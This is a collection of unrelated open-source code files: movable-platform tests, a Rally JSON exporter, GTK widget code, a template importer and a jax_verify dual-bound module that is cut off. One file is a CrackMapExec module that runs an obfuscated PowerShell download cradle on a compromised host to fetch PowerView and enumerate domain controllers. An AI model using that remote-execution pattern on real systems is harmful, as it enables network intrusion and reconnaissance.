_ = FixedMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
)
def test_empty_state_error():
# first, check no error
_ = MovingMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_model=None,
)
with pytest.raises(ValueError, match='States must not be empty'):
_ = MovingMovable(position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_model=None,
)
with pytest.raises(ValueError, match='States must not be empty'):
_ = MovingMovable(states=[],
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_model=None,
)
def test_multi_transition_movable_errors():
# First check no error
models = [ConstantVelocity(0), ConstantTurn(0, np.pi/2)]
now = datetime.now()
times = [timedelta(seconds=10), timedelta(seconds=10)]
_ = MultiTransitionMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_models=models,
transition_times=times,
)
with pytest.raises(AttributeError,
match='transition_models and transition_times must be same length'):
_ = MultiTransitionMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_models=[models[0]],
transition_times=times,
)
with pytest.raises(AttributeError,
match='transition_models and transition_times must be same length'):
_ = MultiTransitionMovable(states=State(StateVector([0, 0, 0, 0, 0, 0])),
position_mapping=[0, 2, 4],
velocity_mapping=[1, 2, 5],
transition_models=models,
transition_times=[now],
)
def test_multi_transition_movable_move():
input_state_vector = StateVector([0, 1, 2.2, 78.6])
pre_state = State(input_state_vector, timestamp=None)
models = [CombinedLinearGaussianTransitionModel((ConstantVelocity(0), ConstantVelocity(0))),
ConstantTurn([0, 0], turn_rate=np.pi / 2)]
times = [timedelta(seconds=10), timedelta(seconds=10)]
movable = MultiTransitionMovable(states=pre_state,
position_mapping=[0, 2],
velocity_mapping=[1, 3],
transition_models=models,
transition_times=times,
)
assert movable.state.state_vector is input_state_vector
assert movable.state.timestamp is None
now = datetime.now()
movable.move(now)
assert movable.state.state_vector is input_state_vector
assert movable.state.timestamp is now
movable.move(None)
assert movable.state.state_vector is input_state_vector
assert movable.state.timestamp is now
movable.move(now + timedelta(seconds=10))
assert movable.state.state_vector is not input_state_vector
assert movable.state.timestamp is not now
|
rally/plugins/task/exporters/json_exporter.py | lolwww/rally | 263 | 11156747 | <filename>rally/plugins/task/exporters/json_exporter.py<gh_stars>100-1000
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import datetime as dt
import json
from rally.common import version as rally_version
from rally.task import exporter
TIMEFORMAT = "%Y-%m-%dT%H:%M:%S"
@exporter.configure("json")
class JSONExporter(exporter.TaskExporter):
"""Generates task report in JSON format."""
# Revisions:
# 1.0 - the json report v1
# 1.1 - add `contexts_results` key with contexts execution results of
# workloads.
# 1.2 - add `env_uuid` and `env_uuid` which represent environment name
# and UUID where task was executed
REVISION = "1.2"
def _generate_tasks(self):
tasks = []
for task in self.tasks_results:
subtasks = []
for subtask in task["subtasks"]:
workloads = []
for workload in subtask["workloads"]:
hooks = [{
"config": {"action": dict([h["config"]["action"]]),
"trigger": dict([h["config"]["trigger"]]),
"description": h["config"]["description"]},
"results": h["results"],
"summary": h["summary"], } for h in workload["hooks"]]
workloads.append(
collections.OrderedDict(
[("uuid", workload["uuid"]),
("description", workload["description"]),
("runner", {
workload["runner_type"]: workload["runner"]}),
("hooks", hooks),
("scenario", {
workload["name"]: workload["args"]}),
("min_duration", workload["min_duration"]),
("max_duration", workload["max_duration"]),
("start_time", workload["start_time"]),
("load_duration", workload["load_duration"]),
("full_duration", workload["full_duration"]),
("statistics", workload["statistics"]),
("data", workload["data"]),
("failed_iteration_count",
workload["failed_iteration_count"]),
("total_iteration_count",
workload["total_iteration_count"]),
("created_at", workload["created_at"]),
("updated_at", workload["updated_at"]),
("contexts", workload["contexts"]),
("contexts_results",
workload["contexts_results"]),
("position", workload["position"]),
("pass_sla", workload["pass_sla"]),
("sla_results", workload["sla_results"]),
("sla", workload["sla"])]
)
)
subtasks.append(
collections.OrderedDict(
[("uuid", subtask["uuid"]),
("title", subtask["title"]),
("description", subtask["description"]),
("status", subtask["status"]),
("created_at", subtask["created_at"]),
("updated_at", subtask["updated_at"]),
("sla", subtask["sla"]),
("workloads", workloads)]
)
)
tasks.append(
collections.OrderedDict(
[("uuid", task["uuid"]),
("title", task["title"]),
("description", task["description"]),
("status", task["status"]),
("tags", task["tags"]),
("env_uuid", task.get("env_uuid", "n\a")),
("env_name", task.get("env_name", "n\a")),
("created_at", task["created_at"]),
("updated_at", task["updated_at"]),
("pass_sla", task["pass_sla"]),
("subtasks", subtasks)]
)
)
return tasks
def generate(self):
results = {"info": {"rally_version": rally_version.version_string(),
"generated_at": dt.datetime.strftime(
dt.datetime.utcnow(), TIMEFORMAT),
"format_version": self.REVISION},
"tasks": self._generate_tasks()}
results = json.dumps(results, sort_keys=False, indent=4)
if self.output_destination:
return {"files": {self.output_destination: results},
"open": "file://" + self.output_destination}
else:
return {"print": results}
|
cme/modules/get_netdomaincontroller.py | retr0-13/CrackMapExec | 6,044 | 11156749 | <filename>cme/modules/get_netdomaincontroller.py
from cme.helpers.powershell import *
from cme.helpers.logger import write_log, highlight
from datetime import datetime
from io import StringIO
class CMEModule:
name = 'get_netdomaincontroller'
description = "Enumerates all domain controllers"
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = False
def options(self, context, module_options):
'''
INJECT If set to true, this allows PowerView to work over 'stealthier' execution methods which have non-interactive contexts (e.g. WMI) (default: True)
'''
self.exec_methods = ['smbexec', 'atexec']
self.inject = True
if 'INJECT' in module_options:
self.inject = bool(module_options['INJECT'])
if self.inject: self.exec_methods = None
self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1')
self.ps_script2 = obfs_ps_script('powersploit/Recon/PowerView.ps1')
def on_admin_login(self, context, connection):
command = 'Get-NetDomainController | select Name,Domain,IPAddress | Out-String'
launcher = gen_ps_iex_cradle(context, 'PowerView.ps1', command)
if self.inject:
launcher = gen_ps_inject(launcher, context, inject_once=True)
connection.ps_execute(launcher, methods=self.exec_methods)
context.log.success('Executed launcher')
def on_request(self, context, request):
if 'Invoke-PSInject.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script1)
elif 'PowerView.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(self.ps_script2)
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.get('content-length'))
data = response.rfile.read(length).decode()
#We've received the response, stop tracking this host
response.stop_tracking_host()
dc_count = 0
if len(data):
buf = StringIO(data).readlines()
for line in buf:
if line != '\r\n' and not line.startswith('Name') and not line.startswith('---'):
try:
hostname, domain, ip = filter(None, line.strip().split(' '))
hostname = hostname.split('.')[0].upper()
domain = domain.split('.')[0].upper()
context.log.highlight('Hostname: {} Domain: {} IP: {}'.format(hostname, domain, ip))
context.db.add_computer(ip, hostname, domain, '', dc=True)
dc_count += 1
except Exception:
context.log.error('Error parsing Domain Controller entry')
context.log.success('Added {} Domain Controllers to the database'.format(highlight(dc_count)))
log_name = 'Get_NetDomainController-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved raw output to {}".format(log_name)) |
codigo/Live177/aa.py | BrunoPontesLira/live-de-python | 572 | 11156754 | <gh_stars>100-1000
from pprint import pprint
pprint('Eduardo')
|
src/gtk/toga_gtk/widgets/internal/buttons/refresh.py | freespace/toga | 1,261 | 11156793 | from toga_gtk.libs import Gtk
from .base import ParentPosition
class RefreshButtonWidget(Gtk.Revealer):
def __init__(self, position: Gtk.Align, margin: int, *args, **kwargs):
super().__init__(*args, **kwargs)
self.parent = None
self.refresh_btn = Gtk.Button.new_from_icon_name(
"view-refresh-symbolic", Gtk.IconSize.BUTTON
)
self.refresh_btn.set_can_focus(False)
refresh_btn_context = self.refresh_btn.get_style_context()
refresh_btn_context.add_class("osd")
refresh_btn_context.add_class("toga-detailed-list-floating-buttons")
refresh_btn_context.remove_class("button")
self.close_btn = Gtk.Button.new_from_icon_name(
"close-symbolic", Gtk.IconSize.BUTTON
)
self.close_btn.set_can_focus(False)
close_btn_context = self.close_btn.get_style_context()
close_btn_context.add_class("osd")
close_btn_context.add_class("toga-detailed-list-floating-buttons")
self.hbox = Gtk.HBox()
self.hbox.add(self.refresh_btn)
self.hbox.add(self.close_btn)
self.set_transition_type(Gtk.RevealerTransitionType.CROSSFADE)
self.set_valign(position)
self.set_halign(Gtk.Align.CENTER)
self.set_margin_top(margin)
self.set_margin_bottom(margin)
self.set_reveal_child(False)
self.add(self.hbox)
def set_on_refresh(self, gtk_on_refresh: callable):
self.refresh_btn.connect(
"clicked",
gtk_on_refresh)
def set_on_close(self, gtk_on_close: callable):
self.close_btn.connect(
"clicked",
gtk_on_close)
def show(self):
self.set_reveal_child(True)
def hide(self):
self.refresh_btn.hide()
self.close_btn.hide()
self.set_reveal_child(False)
def show_close(self):
return self.close_btn.show_now()
def hide_close(self):
return self.close_btn.hide()
def show_refresh(self):
return self.refresh_btn.show_now()
def is_visible(self):
return self.get_reveal_child()
class RefreshButton(ParentPosition):
"""
Shows a refresh button at the top of a list when the user is at the bottom of the list.
Shows a refresh button at the bottom of a list when the user is at the top of the list.
When there is not enough content to scroll, show the button at the bottom and have a side
button to move it to the top. After moving the button to the top, show a button to move it
to the bottom.
Example:
-------------
| Refresh | X |
-------------
"""
def __init__(self, adj: Gtk.Adjustment, margin=12, *args, **kwargs):
super().__init__(adj, *args, **kwargs)
self.margin = margin
self._parent = None
self.on_refresh = None
self.button_top = RefreshButtonWidget(Gtk.Align.START, self.margin)
self.button_top.set_on_refresh(self.gtk_on_refresh_clicked)
self.button_top.set_on_close(self.gtk_on_close_clicked)
self.button_bottom = RefreshButtonWidget(Gtk.Align.END, self.margin)
self.button_bottom.set_on_refresh(self.gtk_on_refresh_clicked)
self.button_bottom.set_on_close(self.gtk_on_close_clicked)
self.gtk_adj_handler = self.adj.connect(
"value-changed",
self.gtk_on_value_changed)
def overlay_over(self, parent):
self._parent = parent
self.list_changed()
parent.add_overlay(self.button_top)
parent.add_overlay(self.button_bottom)
def destroy(self, *args, **kwargs):
self.adj.disconnect(self.gtk_adj_handler)
self.button_top.destroy()
self.button_bottom.destroy()
return super().destroy(*args, **kwargs)
def set_on_refresh(self, on_refresh: callable):
self.on_refresh = on_refresh
def gtk_on_value_changed(self, adj: Gtk.Adjustment):
self.list_changed()
def gtk_on_refresh_clicked(self, w: Gtk.Button):
if self.on_refresh is not None:
self.on_refresh()
def gtk_on_close_clicked(self, w: Gtk.Button):
is_top_visible = self.button_top.is_visible()
is_bottom_visible = self.button_bottom.is_visible()
if not is_top_visible:
self._show_top_full()
if not is_bottom_visible:
self._show_bottom_full()
def _hide_all(self):
self.button_top.hide()
self.button_bottom.hide()
def _show_top_full(self):
self._hide_all()
self.button_top.show()
self.button_top.show_close()
self.button_top.show_refresh()
def _show_top_refresh(self):
self._hide_all()
self.button_top.show()
self.button_top.hide_close()
self.button_top.show_refresh()
def _show_bottom_full(self):
self._hide_all()
self.button_bottom.show()
self.button_bottom.show_close()
self.button_bottom.show_refresh()
def _show_bottom_refresh(self):
self._hide_all()
self.button_bottom.show()
self.button_bottom.show_refresh()
self.button_bottom.hide_close()
def _show_both_full(self):
self._hide_all()
self._show_bottom_full()
def list_changed(self):
if self.on_refresh is None:
self._hide_all()
return
is_scrollable = self.is_parent_scrollable()
is_at_top = self.is_parent_at_top()
is_at_bottom = self.is_parent_at_bottom()
if not is_scrollable:
self._show_both_full()
return
if is_at_top:
self._show_bottom_refresh()
return
if is_at_bottom:
self._show_top_refresh()
return
if not is_at_top and not is_at_bottom:
self._hide_all()
return
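# --- Illustrative usage sketch (editor addition, not part of the original
# module). It assumes a GTK3-style setup where the scrolled list exposes its
# vertical Gtk.Adjustment and sits inside a Gtk.Overlay; the names `overlay`
# and `scrolled` are hypothetical.
#
#   overlay = Gtk.Overlay()
#   scrolled = Gtk.ScrolledWindow()
#   overlay.add(scrolled)
#   refresh = RefreshButton(scrolled.get_vadjustment())
#   refresh.set_on_refresh(lambda: print("refresh requested"))
#   refresh.overlay_over(overlay)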
|
gcloud/template_base/domains/importer.py | DomineCore/bk-sops | 881 | 11156825 |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from django.db import transaction
from .template_manager import TemplateManager
class TemplateImporter:
def __init__(self, template_model_cls):
self.template_model_cls = template_model_cls
def import_template(self, operator: str, template_data: list) -> dict:
"""
        Import a batch of templates on behalf of the given operator.
        :param operator: username of the operator performing the import
:type operator: str
:param template_data: [
{
"override_template_id": "要覆盖的模板的主键ID",
"name": "模板名",
"pipeline_tree": "dict, 模板 pipeline tree",
"description": "模板描述",
"template_kwargs": "dict, 模板创建关键字参数",
"id": "str, 模板临时唯一 ID"
}
]
:type template_data: list
        :return: dict with "result", "data" (list of per-template import results), "message" and "verbose_message"
:rtype: dict
"""
manager = TemplateManager(template_model_cls=self.template_model_cls)
import_result = []
pipeline_id_map = {}
with transaction.atomic():
for td in template_data:
override_template_id = td["override_template_id"]
name = td["name"]
pipeline_tree = td["pipeline_tree"]
description = td["description"]
replace_result = self._replace_subprocess_template_id(pipeline_tree, pipeline_id_map)
if not replace_result["result"]:
import_result.append(replace_result)
continue
if not override_template_id:
create_result = manager.create(
name=name,
creator=operator,
pipeline_tree=pipeline_tree,
template_kwargs=td["template_kwargs"],
description=description,
)
if create_result["result"]:
pipeline_id_map[td["id"]] = create_result["data"].id
import_result.append(create_result)
else:
template = self.template_model_cls.objects.get(id=override_template_id)
update_result = manager.update(
template=template,
editor=operator,
name=name,
pipeline_tree=pipeline_tree,
description=description,
)
if update_result["result"]:
pipeline_id_map[td["id"]] = update_result["data"].id
import_result.append(update_result)
return {"result": True, "data": import_result, "message": "success", "verbose_message": "success"}
def _replace_subprocess_template_id(self, pipeline_tree: dict, pipeline_id_map: dict) -> dict:
"""
        Replace the temporary template IDs in the template data with the primary key IDs of the database models.
        :param pipeline_tree: pipeline tree data of the template
:type pipeline_tree: dict
        :param pipeline_id_map: mapping from temporary IDs in SubProcess nodes to database model primary key IDs
:type pipeline_id_map: dict
"""
if not pipeline_id_map:
return {
"result": True,
"data": None,
"message": "pipeline_id_map is empty",
"verbose_message": "pipeline_id_map is empty",
}
for act in pipeline_tree["activities"].values():
if act["type"] == "SubProcess":
if act["template_id"] not in pipeline_id_map:
return {
"result": False,
"data": None,
"message": "can not find {} in pipeline_id_map".format(act["template_id"]),
"verbose_message": "can not find {} in pipeline_id_map: {}".format(
act["template_id"], pipeline_id_map
),
}
act["template_id"] = pipeline_id_map[act["template_id"]]
return {
"result": True,
"data": None,
"message": "success",
"verbose_message": "success",
}
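# --- Illustrative usage sketch (editor addition, not part of the original
# module). `TaskTemplate` and the pipeline_tree value are hypothetical; any
# Django model class accepted by TemplateManager would do, and a configured
# database connection is required.
#
#   importer = TemplateImporter(template_model_cls=TaskTemplate)
#   result = importer.import_template(
#       operator="admin",
#       template_data=[{
#           "override_template_id": None,
#           "name": "example flow",
#           "pipeline_tree": pipeline_tree,   # dict in pipeline tree format
#           "description": "imported via TemplateImporter",
#           "template_kwargs": {},
#           "id": "tmp_node_1",
#       }],
#   )
#   assert result["result"]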
|
jax_verify/src/nonconvex/duals.py | lberrada/jax_verify | 109 | 11156834 | # coding=utf-8
# Copyright 2021 The jax_verify Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implement the dual computations for the NonConvex Reformulation."""
import collections
import functools
from typing import Callable, Dict, Tuple, Union, List, DefaultDict, Optional
import jax
import jax.numpy as jnp
from jax_verify.src import bound_propagation
from jax_verify.src import synthetic_primitives
from jax_verify.src.nonconvex import nonconvex
Tensor = jnp.ndarray
Index = bound_propagation.Index
ParamSet = nonconvex.ParamSet
EvalFunArgs = [ParamSet, ParamSet, ParamSet]
WolfeDualFn = Callable[[ParamSet, Tensor, ParamSet, Tensor, Tensor, ParamSet],
Tensor]
LagrangianLevelFn = Callable[[Tensor, ParamSet], Tensor]
LagrangianBoundingFn = Callable[[Tensor, ParamSet], Tensor]
LagrangianVarTerm = Tuple[str, Callable[..., Tensor]]
LagrangianDict = DefaultDict[Index, List[LagrangianVarTerm]]
LagrangianVartermsFn = Callable[[Tensor, LagrangianDict], None]
def _sum_fn(fn, *args, **kwargs):
out = fn(*args, **kwargs)
summand = out[0] if isinstance(out, tuple) else out
return summand.sum(), out
def _sum_over_acts(var: Tensor) -> Tensor:
return var.sum(axis=tuple(range(1, var.ndim)))
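# _sum_over_acts reduces over every axis except the leading (per-objective)
# one: an input of shape (nb_targets, H, W, C) maps to shape (nb_targets,).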
CVX_HULL_PRIMITIVES = (synthetic_primitives.relu_p,
synthetic_primitives.softplus_p,
synthetic_primitives.posbilinear_p,
)
class WolfeNonConvexBound(nonconvex.ConstrainedNonConvexBound):
"""This subclass allows the computation of the WolfeDual.
This is done through the `wolfe_dual_fn`, which propagates the dual variables
backwards. The quantity propagated backwards (dvar) needs to
be split between pos_dvar (dual variable on [lb_fun() - z]) and
neg_dvar (dual variable on [z - ub_fun()]).
In the presence of imposed (concrete) constraints, those need to be specified
differently. We need:
(bound_posdvar - bound_negdvar) + (boundfun_posdvar - boundfun_negdvar)
= dvar_cte + sum_{j>i} (boundfun_posdvar_j * lb_fun()
- boundfun_negdvar_j * ub_fun())
which means that we have degrees of freedom.
Current implementation decides based on a greedy approach, ignoring the
downstream consequences. This could be improved.
"""
def __init__(
self,
wolfe_dual_fn: WolfeDualFn,
index: Index,
shape: Tuple[int, ...],
previous_bounds: Dict[Index, 'WolfeNonConvexBound'],
eval_fn: Callable[EvalFunArgs, Tensor],
variables: Dict[Index, Tuple[int, ...]],
concretized_bounds: Optional[bound_propagation.Bound] = None):
"""Create a NonConvexBound that can compute the WolfeDual.
Args:
wolfe_dual_fn: Function performing backward propagation of bounds for the
wolfe dual and computing the contribution of this layer to the dual.
index: Unique index representing the position of this activation in the
computation graph.
shape: Shape of the activations that this bound represent.
previous_bounds: Dict mapping index of activation to the bound
representing it. We need it to be able to obtain the contributions of
previous layers to the Lagrangian.
eval_fn: Function to evaluate the bound computation problem in the primal
variables: Dict mapping index of activation to the shape of variables
required to optimize them.
concretized_bounds: (Optional) Precomputed bounds for this NonConvexBound.
"""
super().__init__(index, shape, previous_bounds,
eval_fn, variables, concretized_bounds)
self.wolfe_dual_fn = wolfe_dual_fn
def dual(self, var_set: ParamSet, objectives: ParamSet
) -> Tuple[Tensor, Tensor]:
dual_vars, acts = self._compute_dualvars_convexgrad(var_set, objectives)
primal = self._objective_fn(acts, objectives)
dual_gap = 0
index_bound_list = list(self.previous_bounds.items())
for index, intermediate_bound in reversed(index_bound_list):
wolfe_dual_fn = intermediate_bound.wolfe_dual_fn
if intermediate_bound.is_constrained():
wolfe_dual_contrib = wolfe_dual_fn(
var_set, dual_vars[index], acts,
intermediate_bound.lower, intermediate_bound.upper, dual_vars)
else:
wolfe_dual_contrib = wolfe_dual_fn(
var_set, dual_vars[index], acts, None, None, dual_vars)
dual_gap = dual_gap + wolfe_dual_contrib
wolfe_dual = primal + dual_gap
return primal, wolfe_dual
@classmethod
def get_initial_bound_constructor(
cls: Callable[..., 'WolfeNonConvexBound'],
index: Index,
lb: Tensor,
ub: Tensor) -> Callable[..., 'WolfeNonConvexBound']:
def wolfe_dual_fn(var_set: ParamSet,
dvar: Tensor,
acts: ParamSet,
bound_lb: Tensor, bound_ub: Tensor,
dual_vars: ParamSet) -> Tensor:
del var_set
del bound_lb
del bound_ub
del dual_vars
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
x_0 = acts[index]
dual_contrib = _sum_over_acts(pos_dvar * (lb - x_0)
+ neg_dvar * (x_0 - ub))
return dual_contrib
return functools.partial(cls, wolfe_dual_fn)
@classmethod
def get_linear_activation_constructor(
cls: Callable[..., 'WolfeNonConvexBound'],
index: Index,
vlin_fun: Callable[..., Tensor],
in_vals: List[Union['WolfeNonConvexBound', Tensor]],
) -> Callable[..., 'WolfeNonConvexBound']:
def wolfe_dual_fn(var_set: ParamSet,
dvar: Tensor,
acts: ParamSet,
bound_lb: Tensor, bound_ub: Tensor,
dual_vars: ParamSet) -> Tensor:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
all_inps = [nonconvex.eval_if_nonconvexbound(inp, var_set, None, acts)
for inp in in_vals]
if bound_lb is not None:
bound_fun_eval = vlin_fun(all_inps)
brd_bound_lb = jnp.expand_dims(bound_lb, 0)
brd_bound_ub = jnp.expand_dims(bound_ub, 0)
bound_posdvar = jnp.where(brd_bound_lb >= bound_fun_eval,
pos_dvar, jnp.zeros_like(pos_dvar))
pos_dvar = pos_dvar - bound_posdvar
bound_negdvar = jnp.where(brd_bound_ub <= bound_fun_eval,
neg_dvar, jnp.zeros_like(neg_dvar))
neg_dvar = neg_dvar - bound_negdvar
_, backprop = jax.vjp(vlin_fun, all_inps)
all_pp_dvars = backprop(pos_dvar)[0]
all_nq_dvars = backprop(neg_dvar)[0]
for i, inp_i in enumerate(in_vals):
if not isinstance(inp_i, nonconvex.NonConvexBound):
continue
prev_dvar = all_pp_dvars[i] - all_nq_dvars[i]
if inp_i.index in dual_vars:
prev_dvar = dual_vars[inp_i.index] + prev_dvar
dual_vars[inp_i.index] = prev_dvar
if bound_lb is not None:
act_out_eval = acts[index]
bound_fun_to_out = bound_fun_eval - act_out_eval
dual_contrib = _sum_over_acts(
jnp.where(bound_posdvar > 0,
bound_posdvar * (brd_bound_lb - act_out_eval),
jnp.zeros_like(bound_posdvar))
+ jnp.where(bound_negdvar > 0,
bound_negdvar * (act_out_eval - brd_bound_ub),
jnp.zeros_like(bound_negdvar))
+ (pos_dvar - neg_dvar) * bound_fun_to_out)
return dual_contrib
else:
# There shouldn't be a contrib term here; everything cancels out.
return 0
return functools.partial(cls, wolfe_dual_fn)
@classmethod
def get_nonlinearity_activation_constructor(
cls: Callable[..., 'WolfeNonConvexBound'],
index: Index,
act_type: str,
lb_fun: Callable[[Tensor], Tensor],
ub_fun: Callable[[Tensor], Tensor],
*inp: 'WolfeNonConvexBound',
) -> Callable[..., 'WolfeNonConvexBound']:
def wolfe_dual_fn(var_set: ParamSet,
dvar: Tensor,
acts: ParamSet,
bound_lb: Tensor, bound_ub: Tensor,
dual_vars: ParamSet) -> Tensor:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
inp_val = [inp_i.evaluate(var_set, {}, acts) for inp_i in inp]
lb_val, lb_backprop = jax.vjp(lb_fun, *inp_val)
ub_val, ub_backprop = jax.vjp(ub_fun, *inp_val)
if bound_lb is not None:
brd_bound_lb = jnp.expand_dims(bound_lb, 0)
brd_bound_ub = jnp.expand_dims(bound_ub, 0)
bound_posdvar = jnp.where(brd_bound_lb >= lb_val,
pos_dvar, jnp.zeros_like(pos_dvar))
pos_dvar = pos_dvar - bound_posdvar
bound_negdvar = jnp.where(brd_bound_ub <= ub_val,
neg_dvar, jnp.zeros_like(neg_dvar))
neg_dvar = neg_dvar - bound_negdvar
backprop_pos = lb_backprop(pos_dvar)
backprop_neg = ub_backprop(neg_dvar)
for (i, inp_i) in enumerate(inp):
prev_dvar = backprop_pos[i] - backprop_neg[i]
if inp_i.index in dual_vars:
prev_dvar = dual_vars[inp_i.index] + prev_dvar
dual_vars[inp_i.index] = prev_dvar
out_val = acts[index]
dual_contrib = _sum_over_acts(neg_dvar * (out_val - ub_val)
+ pos_dvar * (lb_val - out_val))
if bound_lb is not None:
dual_contrib = dual_contrib + _sum_over_acts(
jnp.where(bound_posdvar > 0,
bound_posdvar * (brd_bound_lb - out_val),
jnp.zeros_like(bound_posdvar))
+ jnp.where(bound_negdvar > 0,
bound_negdvar * (out_val - brd_bound_ub),
jnp.zeros_like(bound_negdvar)))
return dual_contrib
return functools.partial(cls, wolfe_dual_fn)
def requires_concretizing(self, consuming_primitive):
needs_concretizing = (consuming_primitive is None
or consuming_primitive in CVX_HULL_PRIMITIVES)
return (self._concretized_bounds is None) and needs_concretizing
def _initial_lagrangian_term(dvar: Tensor, lb: Tensor, ub: Tensor, x: Tensor
) -> Tensor:
pos_dvar = jnp.maximum(dvar, 0.)
neg_dvar = jnp.maximum(-dvar, 0.)
dual_contrib = (neg_dvar * (x - ub) + pos_dvar * (lb - x))
return dual_contrib
class LinLagrangianNonConvexBound(nonconvex.NonConvexBound):
"""This subclass allows the computation of the Linearized Lagrangian dual.
The lagrangian and its linearization are obtained through the
  `lagrangian_level_fn`, which computes the contribution of this layer to the
  lagrangian, based on precomputed activations.
  The minimization of a linear function (such as the linearized lagrangian) over
the feasible domain is done through the `bounding_fn` function.
"""
def __init__(self,
lagrangian_level_fn: LagrangianLevelFn,
bounding_fn: LagrangianBoundingFn,
index: Index,
shape: Tuple[int, ...],
previous_bounds: Dict[Index, 'LinLagrangianNonConvexBound'],
eval_fn: Callable[EvalFunArgs, Tensor],
variables: Dict[Index, Tuple[int, ...]],
concretized_bounds: Optional[bound_propagation.Bound] = None):
"""Create a NonConvexBound that can compute the Linearized Lagrangian dual.
Args:
lagrangian_level_fn: Function returning the contribution of this layer to
the lagrangian, based on precomputed activations.
bounding_fn: Function to perform linear minimization over the domain of
an activation.
index: Unique index representing the position of this activation in the
computation graph.
shape: Shape of the activations that this bound represent.
previous_bounds: Dict mapping index of activation to the bound
representing it. We need it to be able to obtain the contributions of
previous layers to the Lagrangian.
eval_fn: Function to evaluate the bound computation problem in the primal
variables: Dict mapping index of activation to the shape of variables
required to optimize them.
concretized_bounds: (Optional) Precomputed bounds for this NonConvexBound.
"""
super(LinLagrangianNonConvexBound, self).__init__(
index, shape, previous_bounds, eval_fn,
variables, concretized_bounds)
self.lagrangian_level_fn = lagrangian_level_fn
self.bounding_fn = bounding_fn
def lagrangian(acts: ParamSet,
objectives: ParamSet,
dual_vars: Tensor,
) -> Tuple[Tensor, ParamSet]:
primals = self._objective_fn(acts, objectives)
lagrangian = primals
for index, intermediate_bound in self.previous_bounds.items():
lagrangian_level_fn = intermediate_bound.lagrangian_level_fn
dvar = dual_vars[index]
contrib = lagrangian_level_fn(dvar, acts)
lagrangian += contrib
return lagrangian, primals
self._lagrangian_fn = lagrangian
self._lagrangian_sumfn = functools.partial(_sum_fn, lagrangian)
def dual(self, var_set: ParamSet, objectives: ParamSet) -> Tensor:
dual_vars, acts = self._compute_dualvars_nonconvexgrad(var_set, objectives)
# Compute the gradients of all the lagrangians (done by taking their sum),
    # with respect to the activations.
lag_grad_fun = jax.value_and_grad(self._lagrangian_sumfn, argnums=0,
has_aux=True)
((_, (lagrangians, primals)),
laggrad_wrt_acts) = lag_grad_fun(acts, objectives, dual_vars)
lin_duals = lagrangians
for index, intermediate_bound in self.previous_bounds.items():
bounding_fn = intermediate_bound.bounding_fn
lag_grad = laggrad_wrt_acts[index]
contrib = bounding_fn(lag_grad, acts)
lin_duals += contrib
return primals, lin_duals
@classmethod
def get_initial_bound_constructor(
cls: Callable[..., 'LinLagrangianNonConvexBound'],
index: Index,
lb: Tensor,
ub: Tensor) -> Callable[..., 'LinLagrangianNonConvexBound']:
def lagrangian_level_fn(dvar: Tensor, acts: ParamSet) -> Tensor:
x_0 = acts[index]
dual_contrib = _sum_over_acts(_initial_lagrangian_term(dvar, lb, ub, x_0))
return dual_contrib
def bounding_fn(lag_grad: Tensor, acts: ParamSet) -> Tensor:
x_0 = acts[index]
bound_contrib = _sum_over_acts(jnp.maximum(lag_grad, 0.) * (lb - x_0) +
jnp.minimum(lag_grad, 0.) * (ub - x_0))
return bound_contrib
return functools.partial(cls, lagrangian_level_fn, bounding_fn)
@classmethod
def get_linear_activation_constructor(
cls: Callable[..., 'LinLagrangianNonConvexBound'],
index: Index,
vlin_fun: Callable[..., Tensor],
in_vals: Tuple[Union['LinLagrangianNonConvexBound', Tensor], ...]
) -> Callable[..., 'LinLagrangianNonConvexBound']:
def lagrangian_level_fn(dvar: Tensor, acts: ParamSet) -> Tensor:
act_inp_eval = [
acts[inp.index] if isinstance(inp, nonconvex.NonConvexBound) else inp
for inp in in_vals]
# Because this is linear, the function is both the lower bound and the
# upper bound.
act_out_eval = acts[index]
